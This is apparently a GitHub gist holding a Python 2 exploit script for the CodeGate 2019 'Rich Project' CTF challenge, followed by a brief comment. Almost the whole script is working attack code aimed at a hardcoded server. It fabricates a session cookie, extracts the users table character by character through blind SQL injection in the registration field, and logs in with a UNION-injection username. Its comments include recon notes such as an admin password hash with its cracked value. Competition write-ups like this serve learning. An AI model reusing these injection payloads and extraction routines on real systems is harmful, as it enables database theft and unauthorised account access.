@stypr stypr/exploit.py
Last active Aug 17, 2019

CodeGate 2019: Rich Project exploit
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
    """Return a random integer in [10**sz, 100**sz] as a decimal string.

    Used only to make throwaway usernames/passwords unique between requests;
    `random` is not a CSPRNG, which is acceptable here because the value
    only needs to differ per call, not to be unguessable.
    """
    lo, hi = 10 ** sz, 100 ** sz
    return "%d" % random.randint(lo, hi)
# Session cookie attached to every request below. The PHPSESSID value is
# fabricated client-side (fixed prefix + random digits) rather than issued by
# the server; the script evidently relies on the server adopting whatever id
# the client presents — not verifiable from this page.
COOKIE = "PHPSESSID=styprisgood1234123401%s" % rand(5)
def logout():
    """GET ?p=logout with the shared session cookie; return the raw body."""
    req = urllib2.Request("http://110.10.147.112/?p=logout")
    req.add_header("Cookie", COOKIE)
    resp = urllib2.urlopen(req)
    return resp.read()
def join(username, password, account):
    """POST a registration (id/pw/ac) to ?p=reg and return the raw response body.

    The account value is echoed to stdout before the request is sent, so a
    run shows exactly what was submitted in that field (pwn_mysql places
    its SQL subquery there).
    """
    print(account)
    form = urllib.urlencode({'id': username, 'pw': password, 'ac': account})
    req = urllib2.Request("http://110.10.147.112/?p=reg")
    req.add_header("Cookie", COOKIE)
    return urllib2.urlopen(req, form).read()
def info():
    """GET ?p=info for the current session and return the raw HTML.

    pwn_mysql parses the stored account value out of this page (the text
    after "AC :"), so the body is returned unmodified.
    """
    req = urllib2.Request("http://110.10.147.112/?p=info")
    req.add_header("Cookie", COOKIE)
    return urllib2.urlopen(req).read()
def pwn_mysql(blacklist):
    '''Blind-extract the id/pw/ac columns of the `users` table, one character per request.

    Python 2 only (xrange, str.encode('hex'), urllib2 via the helpers).

    Args:
        blacklist: usernames to exclude from the extraction (e.g. rows already
            recovered). Each entry becomes a MySQL hex string literal and is
            placed in a NOT IN list; the parameter is rebound to that
            comma-separated string below.

    Returns:
        list of three strings: the recovered `id`, `pw` and `ac` values, in
        that order (the loop walks `find_out`; `q` is its index, `k` is unused).

    Example call (does network I/O; not a runnable doctest):
    >>> pwn_mysql(['admin', 'stypr', 'lol'])

    Each character is obtained by registering a throwaway user whose `ac`
    field carries a subquery that evaluates to ascii(character i of MAX(y)),
    then reading the stored value back from the info page. Up to 255
    registrations, each preceded by a logout, are issued per column — a
    distinctive pattern in access logs.
    '''
    # Recon notes from the author about the backend.
    # db: userdata
    # user: db_manager
    # version: 5.7.25-0ubuntu
    find_out = ['id', 'pw', 'ac']
    # Build "0x<hex>,0x<hex>,..." from the blacklist entries, then drop the
    # trailing comma and rebind the parameter to the finished literal list.
    b = ""
    for i in blacklist:
        b += "0x" + i.encode('hex')
        b += ","
    b = b[:-1]
    blacklist = b
    leaked = []
    q = 0
    for k in find_out:
        d = ""
        for i in xrange(1, 256):
            # Fresh session state before every probe; the page does not show
            # why this is required — presumably the registration/info pair
            # must not reuse the previous session.
            logout()
            # admin: 4dcc4173d80a2817206e196a38f0dbf7850188ff : ADMIN_ACC0UNTS
            # cracked password = hacker
            """ D0_N0T_RE1E@5E_0THER5 on board.php """
            # like_prefer: LIKE search, you can just put "admin"..
            like_prefer = "0x" + "%a_%".encode('hex')
            ''' use max(), case match, select distinct... to bypass `where` and `limit` phrase '''
            # Throwaway id/pw; the `ac` value is the injected subquery
            # (i = character position, find_out[q] = column being read).
            a = join('stypr' + rand(), 'stypr' + rand(), "' + (select ascii(right(left(max(y),%s),1)) from (select distinct (case when id not in (%s) and id like %s then %s else 1337 end) as y from users)x ))#" % (i,blacklist,like_prefer,find_out[q]))
            # The info page echoes the stored `ac` value, i.e. the ascii code.
            b = info()
            info_rec = b.split("AC :")[1].split("<br")[0].strip()
            tmp = chr(int(info_rec))
            # Terminator: once i runs past the value's length, LEFT(max(y), i)
            # keeps returning the whole value and the last character repeats,
            # so a character equal to the previous one is taken as end of string.
            if d:
                if d[-1] == tmp:
                    break
            d += tmp
            # Python 2 print statement: this prints the tuple ('>>', d).
            print(">>", d)
        leaked.append(d)
        q += 1
    return leaked
def login(username, password, account):
    """POST id/pw/ac to ?p=login under the shared session cookie; return the raw body."""
    form = urllib.urlencode({'id': username, 'pw': password, 'ac': account})
    req = urllib2.Request("http://110.10.147.112/?p=login")
    req.add_header("Cookie", COOKIE)
    return urllib2.urlopen(req, form).read()
def reserv(timed, amount):
    """POST a reservation (code/date/amount) to ?p=reserv; return the raw body.

    `code` is the fixed value the author noted from board.php. Nothing on
    this page calls reserv, so the expected formats of `timed` and `amount`
    are not visible here.
    """
    req = urllib2.Request("http://110.10.147.112/?p=reserv")
    req.add_header("Cookie", COOKIE)
    form = urllib.urlencode({
        'code': "D0_N0T_RE1E@5E_0THER5",
        'date': timed,
        'amount': amount,
    })
    return urllib2.urlopen(req, form).read()
def pay():
    """GET ?p=pay with the fixed `key` query parameter; return the raw body.

    The key travels in the URL, so it ends up in any access log or proxy
    history together with the fabricated session id.
    """
    req = urllib2.Request("http://110.10.147.112/?p=pay&key=D0_N0T_RE1E@5E_0THER5")
    req.add_header("Cookie", COOKIE)
    resp = urllib2.urlopen(req)
    return resp.read()
# robots.txt -> /top_secret.zip
# pay.php --> check pw
# Hex-literal forms of the id/pw that the (commented-out) join() call below
# used when inserting the row; the sha1 of the password is what the table
# stores, hex-encoded again for the literal. Python 2 only (str.encode('hex')).
password = "0x" + hashlib.sha1("stypr_is_nope").hexdigest().encode('hex')
username = "0x" + "S'union select 1,9e99,3,4,5#".encode('hex')
#print join('s'+rand(), 'stypr_flag133713372', "t'),(%s,%s,1234)#" % (username,password,))
#login as S'union select 1,9e99,3,4,5# / stypr_is_nope / 1234
# Log in with the plaintext values of the inserted row, then hit the pay page.
print(login("S'union select 1,9e99,3,4,5#", "stypr_is_nope", "1234"))
print(pay())
@xiao-xing-yun


commented Feb 11, 2019

you seem to be already stereotyped.
